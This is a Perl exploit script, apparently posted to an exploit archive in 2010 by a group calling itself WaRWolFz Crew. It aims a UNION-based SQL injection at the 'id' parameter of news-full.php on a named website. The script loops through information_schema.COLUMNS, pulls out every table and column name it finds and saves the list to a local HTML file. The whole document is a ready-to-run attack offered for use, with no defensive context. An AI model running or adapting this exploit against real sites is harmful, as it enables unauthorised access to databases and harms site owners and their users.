Codice:
#!/usr/bin/perl
#MyNHWw.co.uk Remote SQL Injection - Dump Table & Column Names Exploit
#Author/s: Dante90, WaRWolFz Crew
#Web Site: www.warwolfz.org
use strict;
use HTTP::Request::Common;
use LWP::UserAgent;
use HTTP::Cookies;
#START - Define Variables
my $Message = "";
my $HostName = "www.mynhw.co.uk"; #Insert Victime Web Site Link
my $Path = "./"; #Insert the path where PHP-Nuke is installed. If it doesn't exist, you have to leave this field empty
my $Host = "http://".$HostName."/".$Path."/";
my $Referrer = "http://www.warwolfz.org/";
my $Method = HTTP::Request->new(GET => $Host);
my $Cookies = new HTTP::Cookies;
my $HTTP = new LWP::UserAgent(
agent => 'Mozilla/5.0',
max_redirect => 0,
cookie_jar => $Cookies,
) or die $!;
#END - Define Variables
sub Clear() {
my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear';
return system($launch);
}
sub HTTP_Request(){
$Referrer = $_[0];
$Method->referrer($Referrer);
my $Response = $HTTP->request($Method);
return $Response->is_success() or die "$Host : ", $Response->message,"\n";
}
sub Usage {
Clear();
{
print " \n MyNHWw.co.uk Remote SQL Injection - Dump Table & Column Names Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";
};
exit;
}
sub Refresh {
Clear();
{
print " \n MyNHWw.co.uk Remote SQL Injection - Dump Table & Column Names Exploit\n";
print " ------------------------------------------------------ \n";
print " * USAGE: *\n";
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
print " * perl name_exploit.pl *\n";
print " ------------------------------------------------------ \n";
print " * Powered By Dante90, WaRWolFz Crew *\n";
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
print " ------------------------------------------------------ \n";
};
print " * Victime Site: " . $_[0] . "\n";
print $_[1] ."\n";
}
sub Failed {
Clear();
Refresh($Host, $Message);
print " * Exploit Failed *\n";
print " ------------------------------------------------------ \n";
exit;
}
sub SQL_Injection {
my ($dec) = @_;
#http://www.mynhw.co.uk/news-full.php?id=-394 UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,32),table_name,column_name),4,5,6,7,8,9,10,11,12,13 FROM information_schema.COLUMNS LIMIT 0,1--
return "./news-full.php?id=-394 UNION SELECT 1,2,CONCAT_WS(CHAR(32,58,58,58,32),table_name,column_name),4,5,6,7,8,9,10,11,12,13 FROM information_schema.COLUMNS LIMIT ${dec},1--";
}
sub Main() {
Clear();
my ($Table, $Column, $data) = "";
$Message .= " * Starting...";
Refresh($Host, $Message);
open (FILE, ">dump_table_column_name.html") || die ("");
for(my $I=0; $I<=5000; $I++){
my $Get = $HTTP->get($Host.SQL_Injection($I));
if ($Get->content =~ /<span class="style5">([a-zA-Z0-9-_.]{1,50}) ::: ([a-zA-Z0-9-_.]{1,50})<\/span><br \/>/i) {
$Table = $1;
$Column = $2;
$data .= $Table." | ".$Column."\n";
$Message = " * Starting...";
$Message .= "\n * Table Name: ".$Table."\n * Column Name: ".$Column."\n";
Refresh($Host, $Message);
} elsif ($Get->content !=~ /<span class="style5">/i) {
$I=5000;
Refresh($Host, $Message);
} else {
$Message .= "\n * Failed.";
Failed($Host, $Message);
}
}
print FILE $data;
close (FILE);
$Message .= " * DUMPED.";
Refresh($Host, $Message);
print " * Exploit Successfully Executed *\n";
print " ------------------------------------------------------\n ";
system("pause");
exit;
}
Main();
#WaRWolFz Crew
#WaRWolFz 2010.07.27Dante